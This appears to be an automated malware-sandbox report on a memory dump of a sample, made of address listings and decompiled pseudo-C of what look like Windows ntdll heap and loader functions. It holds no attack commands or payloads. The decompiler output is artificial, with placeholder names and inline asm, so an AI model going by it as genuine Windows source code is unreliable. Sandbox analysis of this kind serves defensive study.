                    0x016d14a7
                    0x016d14a9
                    0x016d14ab
                    0x016d14ab
                    0x016d149c
                    0x016d149e
                    0x016d14a0
                    0x016d14b0
                    0x016d14b0
                    0x00000000
                    0x016d14a2
                    0x016d14a2
                    0x00000000
                    0x016d14a2
                    0x016d14a0
                    0x016d14b3
                    0x016d14bb
                    0x00000000
                    0x016d14bb
                    0x016d1495
                    0x01689a7c
                    0x01689a7c
                    0x01689a7f
                    0x01689a7f
                    0x01689a82
                    0x01689a84
                    0x01689a87
                    0x01689a8a
                    0x01689a8d
                    0x01689a8f
                    0x016d166a
                    0x016d166a
                    0x016d166b
                    0x016d1674
                    0x00000000
                    0x016d1674
                    0x01689a95
                    0x01689a97
                    0x00000000
                    0x00000000
                    0x01689aa0
                    0x01689aa3
                    0x01689aa9
                    0x01689aab
                    0x01689ad7
                    0x01689ad7
                    0x01689ada
                    0x01689add
                    0x01689adf
                    0x01689ae2
                    0x01689ae6
                    0x01689b22
                    0x01689b27
                    0x01689b29
                    0x00000000
                    0x01689b2b
                    0x016d15be
                    0x00000000
                    0x016d15be
                    0x01689b29
                    0x01689ae8
                    0x01689ae8
                    0x01689aeb
                    0x01689aee
                    0x016d15cb
                    0x016d15d2
                    0x016d15d5
                    0x016d15d7
                    0x016d15da
                    0x016d15dc
                    0x016d15dc
                    0x016d15dc
                    0x016d15da
                    0x016d15e5
                    0x016d15e9
                    0x016d15ee
                    0x016d15f1
                    0x016d15f3
                    0x016d15f9
                    0x016d1600
                    0x016d1604
                    0x016d1624
                    0x016d1629
                    0x016d1606
                    0x016d161c
                    0x016d1621
                    0x016d1637
                    0x016d163e
                    0x016d1643
                    0x016d1649
                    0x016d164c
                    0x016d1650
                    0x016d1656
                    0x016d165d
                    0x016d165e
                    0x016d165e
                    0x016d1650
                    0x016d15f3
                    0x01689af4
                    0x01689af7
                    0x01689afc
                    0x01689b00
                    0x01689b04
                    0x01689b08
                    0x01689b14
                    0x016899fe
                    0x01689a04
                    0x01689a07
                    0x00000000
                    0x01689a29
                    0x016d169c
                    0x016d16a0
                    0x016d16a5
                    0x016d16a9
                    0x016d16b5
                    0x016d16ba
                    0x016d16bc
                    0x016d16be
                    0x016d16c3
                    0x016d16c3
                    0x016d16bc
                    0x016d16c8
                    0x016d16cc
                    0x016d181b
                    0x016d181b
                    0x016d181e
                    0x016d181e
                    0x016d1821
                    0x016d1823
                    0x016d1826
                    0x016d1829
                    0x016d182c
                    0x016d182e
                    0x016d1688
                    0x016d1688
                    0x016d1689
                    0x016d168b
                    0x016d168c
                    0x016d168d
                    0x016d168f
                    0x016d1692
                    0x00000000
                    0x016d1692
                    0x016d1834
                    0x016d1836
                    0x00000000
                    0x00000000
                    0x016d183f
                    0x016d1842
                    0x016d1848
                    0x016d184a
                    0x016d1875
                    0x016d1875
                    0x016d1878
                    0x016d187b
                    0x016d187d
                    0x016d1880
                    0x016d1884
                    0x016d18a7
                    0x016d18a7
                    0x016d18aa
                    0x016d18ad
                    0x016d18b6
                    0x016d18bd
                    0x016d18c0
                    0x016d18c3
                    0x016d18c5
                    0x016d18c8
                    0x016d18ca
                    0x016d18ca
                    0x016d18cd
                    0x016d18cd
                    0x016d18c8
                    0x016d18d5
                    0x016d18da
                    0x016d18df
                    0x016d18e2
                    0x016d18e5
                    0x016d18e7
                    0x016d18ee
                    0x016d18f2
                    0x016d1912
                    0x016d1917
                    0x016d18f4
                    0x016d190a
                    0x016d190f
                    0x016d1925
                    0x016d192c
                    0x016d1931
                    0x016d193a
                    0x016d193e
                    0x016d1940
                    0x016d1947
                    0x016d1948
                    0x016d1948
                    0x016d193e
                    0x016d18e5
                    0x016d194f
                    0x016d1952
                    0x016d1956
                    0x016d195d
                    0x016d1961
                    0x016d196d
                    0x00000000
                    0x016d196d
                    0x016d188a
                    0x016d188f
                    0x016d1891
                    0x00000000
                    0x00000000
                    0x016d189d
                    0x00000000
                    0x016d189d
                    0x016d184c
                    0x016d1859
                    0x016d1859
                    0x016d185c
                    0x00000000
                    0x00000000
                    0x016d1851
                    0x016d1853
                    0x016d1855
                    0x016d1865
                    0x016d1865
                    0x016d1866
                    0x016d1868
                    0x016d1870
                    0x00000000
                    0x016d1870
                    0x016d1857
                    0x016d1857
                    0x016d185e
                    0x00000000
                    0x016d16d2
                    0x016d16d2
                    0x016d16d5
                    0x016d16d5
                    0x016d16d8
                    0x016d16da
                    0x016d16dd
                    0x016d16e0
                    0x016d16e3
                    0x016d16e5
                    0x016d1808
                    0x016d1808
                    0x016d1809
                    0x016d1812
                    0x016d1817
                    0x016d1817
                    0x00000000
                    0x016d1817
                    0x016d16eb
                    0x016d16ed
                    0x00000000
                    0x00000000
                    0x016d16f6
                    0x016d16f9
                    0x016d16ff
                    0x016d1701
                    0x016d172c
                    0x016d172c
                    0x016d172f
                    0x016d1732
                    0x016d1734
                    0x016d1737
                    0x016d173b
                    0x016d175e
                    0x016d175e
                    0x016d1761
                    0x016d1764
                    0x016d176d
                    0x016d1774
                    0x016d1777
                    0x016d177a
                    0x016d177c
                    0x016d177f
                    0x016d1781
                    0x016d1781
                    0x016d1784
                    0x016d1784
                    0x016d177f
                    0x016d178c
                    0x016d1791
                    0x016d1796
                    0x016d1799
                    0x016d179c
                    0x016d179e
                    0x016d17a5
                    0x016d17a9
                    0x016d17c9
                    0x016d17ce
                    0x016d17ab
                    0x016d17c1
                    0x016d17c6
                    0x016d17dc
                    0x016d17e3
                    0x016d17e8
                    0x016d17ee
                    0x016d17f1
                    0x016d17f5
                    0x016d17f7
                    0x016d17fe
                    0x016d17ff
                    0x016d17ff
                    0x016d17f5
                    0x016d179c
                    0x00000000
                    0x016d1764
                    0x016d1741
                    0x016d1746
                    0x016d1748
                    0x00000000
                    0x00000000
                    0x016d1754
                    0x00000000
                    0x016d1754
                    0x016d1703
                    0x016d1710
                    0x016d1710
                    0x016d1713
                    0x00000000
                    0x00000000
                    0x016d1708
                    0x016d170a
                    0x016d170c
                    0x016d171c
                    0x016d171c
                    0x016d171d
                    0x016d171f
                    0x016d1727
                    0x00000000
                    0x016d1727
                    0x016d170e
                    0x016d170e
                    0x016d1715
                    0x00000000
                    0x016d1715
                    0x016d16cc
                    0x01689a45
                    0x01689a45
                    0x01689a0e
                    0x01689a1c
                    0x01689a23
                    0x016d167e
                    0x016d167f
                    0x016d1681
                    0x016d1683
                    0x016d1684
                    0x00000000
                    0x016d1684
                    0x00000000
                    0x01689aad
                    0x01689aad
                    0x01689ab0
                    0x01689ab3
                    0x01689ab3
                    0x01689ab6
                    0x00000000
                    0x00000000
                    0x01689ab8
                    0x01689aba
                    0x01689abc
                    0x01689ac8
                    0x01689ac8
                    0x00000000
                    0x01689abe
                    0x01689abe
                    0x01689ac0
                    0x00000000
                    0x01689ac0
                    0x01689abc
                    0x01689ad2
                    0x00000000
                    0x01689ad2
                    0x01689aab

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                    • API String ID: 0-3178619729
                    • Opcode ID: 87fd42a63817da19b8cecef7faf9a59ca4b1e4b40e9c2d4954a05e3a47f9f246
                    • Instruction ID: c796218a04a3b93394305ea35b7c3f44bfc59af59cf461e22e8d2928cbcfc4bf
                    • Opcode Fuzzy Hash: 87fd42a63817da19b8cecef7faf9a59ca4b1e4b40e9c2d4954a05e3a47f9f246
                    • Instruction Fuzzy Hash: 0522F370A002429FEB25DF2DCC85B7ABBB5EF46704F18856DE8468B342D7B5D881CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168B477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0168B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x175d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0168B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E016AB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x1758748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E0166B150();
						} else {
							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E0166B150();
						__eflags =  *0x1757bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01722073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x1758a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x175b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E016A9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0172A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E016A9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0172138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0171FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0172A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0172A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01687D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01721582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01687D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01721582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0168B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0168BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0172A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                    0x0168b486
                    0x0168b48a
                    0x0168b48e
                    0x0168b491
                    0x0168b493
                    0x0168b49a
                    0x0168b49c
                    0x0168b4a2
                    0x0168b4a7
                    0x0168b6fc
                    0x0168b6fc
                    0x0168b6b3
                    0x0168b6c3
                    0x0168b6c3
                    0x0168b4b4
                    0x016d294f
                    0x016d2951
                    0x016d2957
                    0x016d295d
                    0x016d2961
                    0x016d2980
                    0x016d2985
                    0x016d2963
                    0x016d2978
                    0x016d297d
                    0x016d298b
                    0x016d2990
                    0x016d2995
                    0x016d299d
                    0x016d29a1
                    0x016d29a2
                    0x016d29a2
                    0x016d29a7
                    0x016d29a7
                    0x016d2951
                    0x0168b4ba
                    0x0168b4ba
                    0x0168b4bd
                    0x0168b4c2
                    0x0168b6d4
                    0x0168b4c8
                    0x0168b4c8
                    0x0168b4c8
                    0x0168b4cd
                    0x0168b4d0
                    0x0168b4d9
                    0x0168b4df
                    0x0168b4e2
                    0x016d29b7
                    0x016d29bd
                    0x00000000
                    0x0168b4e8
                    0x0168b4e8
                    0x0168b4ef
                    0x0168b4fa
                    0x0168b703
                    0x0168b709
                    0x0168b70b
                    0x0168b711
                    0x0168b711
                    0x0168b70b
                    0x0168b503
                    0x0168b50c
                    0x0168b511
                    0x0168b514
                    0x0168b519
                    0x016d29c5
                    0x016d29c7
                    0x016d29cc
                    0x016d29cd
                    0x016d29cf
                    0x016d29d0
                    0x016d29d2
                    0x016d29d7
                    0x016d29d9
                    0x016d29ee
                    0x016d29ee
                    0x016d29f4
                    0x016d29fa
                    0x016d2a01
                    0x00000000
                    0x016d2a01
                    0x016d29db
                    0x016d29df
                    0x00000000
                    0x00000000
                    0x016d29e1
                    0x016d29e4
                    0x00000000
                    0x00000000
                    0x016d29e6
                    0x016d29e6
                    0x0168b51f
                    0x0168b51f
                    0x0168b520
                    0x0168b525
                    0x0168b52b
                    0x0168b52d
                    0x0168b52e
                    0x0168b530
                    0x0168b535
                    0x0168b53b
                    0x0168b53d
                    0x016d2a07
                    0x00000000
                    0x016d2a07
                    0x0168b549
                    0x0168b54e
                    0x016d2a12
                    0x016d2a15
                    0x00000000
                    0x00000000
                    0x016d2a24
                    0x0168b559
                    0x0168b55c
                    0x016d2a34
                    0x016d2a3b
                    0x016d2a4d
                    0x016d2a4d
                    0x016d2a3b
                    0x0168b566
                    0x0168b56b
                    0x0168b56f
                    0x0168b57b
                    0x0168b582
                    0x016d2a57
                    0x016d2a5c
                    0x016d2a5c
                    0x0168b582
                    0x0168b58b
                    0x0168b58e
                    0x0168b592
                    0x0168b596
                    0x0168b599
                    0x0168b59b
                    0x0168b59e
                    0x0168b5a3
                    0x0168b5a6
                    0x0168b5a9
                    0x016d2a66
                    0x016d2a67
                    0x016d2a73
                    0x016d2a78
                    0x0168b5b8
                    0x0168b5b8
                    0x0168b5bb
                    0x0168b5bd
                    0x0168b5bd
                    0x0168b5c4
                    0x0168b5f7
                    0x0168b5f7
                    0x0168b600
                    0x0168b606
                    0x0168b60c
                    0x0168b612
                    0x0168b618
                    0x0168b621
                    0x0168b623
                    0x0168b629
                    0x0168b629
                    0x0168b62c
                    0x0168b62f
                    0x0168b633
                    0x0168b636
                    0x0168b639
                    0x0168b71d
                    0x0168b720
                    0x0168b736
                    0x0168b660
                    0x0168b660
                    0x0168b662
                    0x0168b665
                    0x0168b66a
                    0x0168b6e6
                    0x0168b6e7
                    0x0168b6ea
                    0x0168b6ef
                    0x016d2ad1
                    0x016d2ad2
                    0x016d2ad8
                    0x016d2add
                    0x016d2add
                    0x0168b6f5
                    0x0168b6f5
                    0x0168b672
                    0x0168b675
                    0x0168b67a
                    0x016d2ae5
                    0x016d2ae8
                    0x00000000
                    0x00000000
                    0x016d2af4
                    0x016d2afc
                    0x00000000
                    0x0168b680
                    0x0168b680
                    0x0168b680
                    0x0168b685
                    0x0168b687
                    0x0168b68a
                    0x016d2b06
                    0x016d2b0c
                    0x016d2b13
                    0x016d2b1e
                    0x016d2b20
                    0x016d2b2b
                    0x016d2b2b
                    0x016d2b2b
                    0x016d2b34
                    0x016d2b45
                    0x016d2b45
                    0x016d2b13
                    0x0168b696
                    0x0168b69b
                    0x0168b6a0
                    0x016d2b4f
                    0x016d2b52
                    0x00000000
                    0x00000000
                    0x016d2b61
                    0x00000000
                    0x0168b6a6
                    0x0168b6a6
                    0x0168b6a6
                    0x0168b6a8
                    0x0168b6ab
                    0x016d2b70
                    0x016d2b72
                    0x016d2b7d
                    0x016d2b7d
                    0x016d2b7d
                    0x016d2b86
                    0x016d2b97
                    0x016d2b97
                    0x0168b6b1
                    0x00000000
                    0x0168b6b1
                    0x0168b6a0
                    0x0168b67a
                    0x0168b722
                    0x0168b722
                    0x0168b655
                    0x0168b65d
                    0x00000000
                    0x0168b5c6
                    0x0168b5c6
                    0x0168b5ce
                    0x016d2a83
                    0x016d2a97
                    0x016d2a97
                    0x016d2a9a
                    0x00000000
                    0x00000000
                    0x016d2a88
                    0x016d2a8a
                    0x016d2a8c
                    0x016d2a8f
                    0x016d2a92
                    0x016d2aa1
                    0x016d2aa1
                    0x016d2aa2
                    0x016d2aab
                    0x016d2ab0
                    0x00000000
                    0x016d2ab0
                    0x016d2a94
                    0x016d2a94
                    0x00000000
                    0x016d2a9c
                    0x0168b5d4
                    0x0168b5d4
                    0x0168b5d6
                    0x0168b5d9
                    0x0168b5de
                    0x0168b5e1
                    0x0168b5e4
                    0x016d2ab8
                    0x016d2ab9
                    0x016d2ac4
                    0x016d2ac9
                    0x0168b5f2
                    0x0168b5f2
                    0x0168b5f4
                    0x0168b5f4
                    0x00000000
                    0x0168b5e4
                    0x0168b5c4
                    0x0168b554
                    0x0168b554
                    0x00000000
                    0x0168b554

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: 18e94a05143f0f42e7eb6bfcede0e057bb3253d5aa963e9d23245e6e68d86387
                    • Instruction ID: 2a77d9f2b5e6071fe0e85b56c6de457f8667d5878cb20adfbc3fb7fc1b2cf815
                    • Opcode Fuzzy Hash: 18e94a05143f0f42e7eb6bfcede0e057bb3253d5aa963e9d23245e6e68d86387
                    • Instruction Fuzzy Hash: 66E19D70A00206DFDB19DF68CC94B7ABBB5FF44304F1482A9E5169B391D770E982CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01678794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E01678794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0167934A() != 0) {
								_t159 = E016EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1755780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1755780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0167849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01678999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01678999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1755c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1755c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01682280(_t92, 0x17586cc);
															_t94 = E01739DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1755c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
